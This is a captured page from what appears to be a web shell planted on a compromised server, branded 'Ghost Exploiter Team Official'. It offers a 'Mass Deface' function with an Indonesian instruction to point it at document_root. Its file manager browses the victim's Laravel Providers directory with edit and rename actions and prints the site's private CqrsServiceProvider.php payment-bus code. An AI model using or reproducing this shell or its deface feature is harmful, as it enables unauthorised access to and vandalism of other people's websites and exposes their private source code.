Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Providers
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AppServiceProvider.php
0.787KB
edt
ren
CqrsServiceProvider.php
1.188KB
edt
ren
TelescopeServiceProvide
...
1.548KB
edt
ren
<?php declare(strict_types=1); namespace App\Providers; use App\Buses\CommandBus; use App\Buses\QueryBus; use App\Contracts\CommandBusContract; use App\Contracts\QueryBusContract; use App\Domain\Object\Handlers\Read\GetAllPaymentsQueryHandler; use App\Domain\Object\Handlers\Read\GetPaymentByIdQueryHandler; use App\Domain\Payment\Queries\GetAllPaymentsQuery; use App\Domain\Payment\Queries\GetPaymentByIdQuery; use Illuminate\Support\ServiceProvider; final class CqrsServiceProvider extends ServiceProvider { /** * Register any application services. */ public function register(): void { $this->app->singleton( abstract: CommandBusContract::class, concrete: CommandBus::class ); $this->app->singleton( abstract: QueryBusContract::class, concrete: QueryBus::class ); } /** * Bootstrap any application services. */ public function boot(): void { app(abstract: QueryBusContract::class)->register(map: [ GetAllPaymentsQuery::class => GetAllPaymentsQueryHandler::class, GetPaymentByIdQuery::class => GetPaymentByIdQueryHandler::class, ]); } }
<=Back
Liking